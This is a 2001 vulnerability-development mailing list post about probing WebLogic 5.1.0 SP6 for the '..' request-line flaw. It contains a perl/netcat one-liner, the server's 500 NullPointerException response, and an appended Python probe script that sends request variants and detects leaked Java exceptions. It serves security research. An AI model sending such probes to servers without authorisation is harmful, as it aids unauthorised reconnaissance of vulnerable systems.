Vulnerability Development mailing list archives

WebLogic 5.1.0 SP < SP6


From: "Matt W." <kmx () EGATOBAS ORG>
Date: Wed, 14 Mar 2001 03:05:30 -0600

I was pentesting a few WebLogic 5.1.0 SP6 web servers and came across the
".." Double Dot Vulnerability (Bugtraq ID 2138) and was wondering if
anyone has successfully created an exploit for it.

I've been playing with it, and all I can get out of the WebLogic server
is the following:

perl -e 'print "GET" . "/.." . "A" x 10 . "HTTP/1.0" . "\n\n"' | nc <server> <port>

HTTP/1.1 500 Internal Server Error
Server: Weblogic 5.1.0 Service Pack 6 09/20/2000
Content-Length: 0
Content-Type: text/html
Connection:Close
java.lang.NullPointerException

<disconnect>

Server stays up, no crash.

The other interesting thing is that if you put a space between the GET and
the /.. it still does the above, but if I put a space between the A's and
the HTTP/1.0 there is no error.

Anyone got more info?

-matt
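The request variants and the response capture described in the post, as an added example (this is not code from the post or from WebLogic). It reproduces the three request-line spacings Matt reports, parses a raw HTTP response tolerant of sloppy headers such as "Connection:Close", and flags a leaked Java exception name in the reply. The host and port are placeholders, and the sample response is constructed to match the capture in the post; the script makes no claim beyond what the post observed.

```python
"""Probe for the WebLogic 5.1.0 '..' request-line behaviour described in the post.

Added example, not code from the original post. The sample response below is
constructed from the capture in the post; host/port are placeholders.
"""
import socket
import sys

# The three spacings the post discusses, keyed by a label for reporting.
# The original one-liner emits no spaces at all: "GET/..AAAAAAAAAAHTTP/1.0".
VARIANTS = {
    "no-spaces (original)": dict(),
    "space after GET": dict(space_after_method=True),
    "space before HTTP/1.0": dict(space_before_version=True),
}


def build_request(padding=10, space_after_method=False,
                  space_before_version=False):
    """Build the raw request line: GET, '/..', `padding` A's, HTTP/1.0, two LFs."""
    return b"".join([
        b"GET",
        b" " if space_after_method else b"",
        b"/..",
        b"A" * padding,
        b" " if space_before_version else b"",
        b"HTTP/1.0",
        b"\n\n",
    ])


def parse_response(raw):
    """Split a raw HTTP response into status code, headers, body and leaked exception.

    Header/body separation falls back from CRLFCRLF to LFLF; header lines are
    split on the first colon so 'Connection:Close' (no space) still parses.
    The exception scan covers the whole reply because the post's capture shows
    the Java class name directly after the headers.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    text = raw.decode("latin-1", "replace")
    lines = head.decode("latin-1", "replace").splitlines()
    status = None
    if lines:
        fields = lines[0].split()
        if len(fields) >= 2 and fields[1].isdigit():
            status = int(fields[1])
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    exception = None
    for token in text.split():
        if token.startswith(("java.", "javax.")):
            exception = token.strip(".,;:")
            break
    return {
        "status": status,
        "headers": headers,
        "body": body.decode("latin-1", "replace").strip(),
        "exception": exception,
    }


def send_raw(host, port, request, timeout=5.0):
    """Send raw bytes over TCP and return everything read until close or timeout."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def probe(host, port):
    """Send every variant and return {label: parsed response}."""
    return {label: parse_response(send_raw(host, port, build_request(**kw)))
            for label, kw in VARIANTS.items()}


# Constructed sample matching the capture in the post (not a real server reply).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 500 Internal Server Error\r\n"
    b"Server: Weblogic 5.1.0 Service Pack 6 09/20/2000\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection:Close\r\n"
    b"\r\n"
    b"java.lang.NullPointerException\r\n"
)

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: probe.py <server> <port>; offline demo follows")
        r = parse_response(SAMPLE_RESPONSE)
        print("sample:", r["status"], r["exception"])
    else:
        for label, r in probe(sys.argv[1], int(sys.argv[2])).items():
            print("%-24s status=%s exception=%s" % (label, r["status"], r["exception"]))
```

Run it with a host and port to send all three variants and see which ones return a 500 with the exception name in the reply; without arguments it only parses the constructed sample. The parser deliberately accepts headers with no space after the colon and a missing blank line before the body, since both appear in captures like the one in the post.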

